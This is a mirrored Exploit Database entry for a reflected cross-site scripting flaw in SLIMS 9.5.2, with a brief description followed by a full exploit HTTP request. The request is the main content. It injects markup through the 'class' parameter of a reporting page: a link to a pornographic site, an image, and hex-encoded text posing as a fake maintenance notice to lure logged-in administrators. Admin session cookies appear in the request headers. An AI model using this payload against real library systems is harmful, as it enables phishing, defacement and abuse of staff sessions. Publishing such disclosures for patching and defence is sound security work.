SLIMSV 9.5.2 – Cross-Site Scripting (XSS)

• Exploit Database
• 33 阅读

• 作者： nu11secur1ty
  日期： 2023-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51211/

• ## Exploit Title: SLIMSV 9.5.2 - Cross-Site Scripting (XSS) 
  ## Development: nu11secur1ty
  ## Date: 01.19.2023
  ## Vendor: https://slims.web.id/web/
  ## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2
  ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2
  
  ## Description:
  The value of manual insertion `point 3` is copied into the HTML
  document as plain text between tags.
  The payload udz21<script>alert(1)</script>rk346 was submitted in
  manual insertion point 3.
  This input was echoed unmodified in the application's response.
  The attacker can trick the already logged-in user, to visit the
  exploit link that this attacker is created,
  and if this already logged-in user is not actually IT or admin, this
  will be the end of this system.
  
  
  ## STATUS: HIGH Vulnerability
  
  [+] Exploit:
  ```
  GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27
  HTTP/1.1
  Host: pwnedhost1.com
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
  Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;
  SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4
  Connection: close
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)
  
  ## Proof and Exploit:
  [href](https://streamable.com/zd6e18)
  
  ## Reference:
  [href](https://portswigger.net/web-security/cross-site-scripting)
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html
  https://cxsecurity.com/ and https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>